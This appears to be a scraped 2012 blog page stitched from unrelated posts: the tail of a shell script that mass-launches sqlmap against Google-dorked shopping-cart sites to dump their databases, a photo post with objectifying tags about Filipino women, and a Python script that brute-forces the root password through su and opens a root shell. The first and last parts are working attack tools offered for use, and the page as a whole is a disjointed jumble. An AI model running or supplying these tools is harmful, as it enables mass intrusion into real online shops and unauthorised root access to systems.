screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:shop buy” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:shop buy” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:shop product” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:shop product” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:shop product” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:cart cart” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:cart cart” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:cart cart” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:cart id” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:cart id” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:cart id” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:cart item” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:cart item” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:cart item” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:cart buy” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:cart buy” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:cart buy” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:php inurl:cart product” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:cfm inurl:cart product” –dbs –batch
screen -dm ${COUNTRY}/sqlmap.py -g “site:${COUNTRY} ext:aspx inurl:cart product” –dbs –batch
echo “[*]”
echo “[*]”
echo “[*] Done! 30 sqlmap running”
echo “[*] Type ‘screen -r’ to check status”
fi

Saturday, February 4, 2012

Why I Love Pinays - Rediscovering The Beauty of Filipinas

I decided to upload the photos I saw in Facebook today which should definitely be the reason why I love Pinays or Filipinas.  Even if they are not famous or actresses they will surely blow up your mind ;) <Trust me>
Filipina

pinay beauties

Pilipina

binibini

louisian girls

babae

chinita

pinay model

beautiful pics

snob

pretty girls

yummy pinays

cute filipina

Friday, February 3, 2012

Local Root BruteForcer

Local Root BruteForce Scanner work by backconnect or backdoor. (It still needs a password list)


#!/usr/bin/python 
#Local Root BruteForcer 
 
 
#d3hydr8[at]gmail[dot]com 
 
import sys 
try: 
    import pexpect 
except(ImportError): 
    print "\nYou need the pexpect module." 
    print "http://www.noah.org/wiki/Pexpect\n" 
    sys.exit(1) 
 
#Change this if needed. 
LOGIN_ERROR = 'su: incorrect password' 
 
def brute(word): 
    print "Trying:",word 
    child = pexpect.spawn ('su') 
    child.expect ('Password: ') 
    child.sendline (word) 
    i = child.expect (['.+\s#\s',LOGIN_ERROR]) 
    if i  == 0: 
        print "\n\t[!] Root Password:",word 
        child.sendline ('whoami') 
        print child.before 
        child.interact() 
    #if i == 1: 
        #print "Incorrect Password" 
 
if len(sys.argv) != 2: 
    print "\nUsage : ./rootbrute.py <wordlist>" 
    print "Eg: ./rootbrute.py words.txt\n" 
    sys.exit(1) 
 
try: 
    words = open(sys.argv[1], "r").readlines() 
except(IOError): 
      print "\nError: Check your wordlist path\n" 
      sys.exit(1) 
 
print "\n[+] Loaded:",len(words),"words" 
print "[+] BruteForcing...\n" 
for word in words: 
    brute(word.replace("\n",""))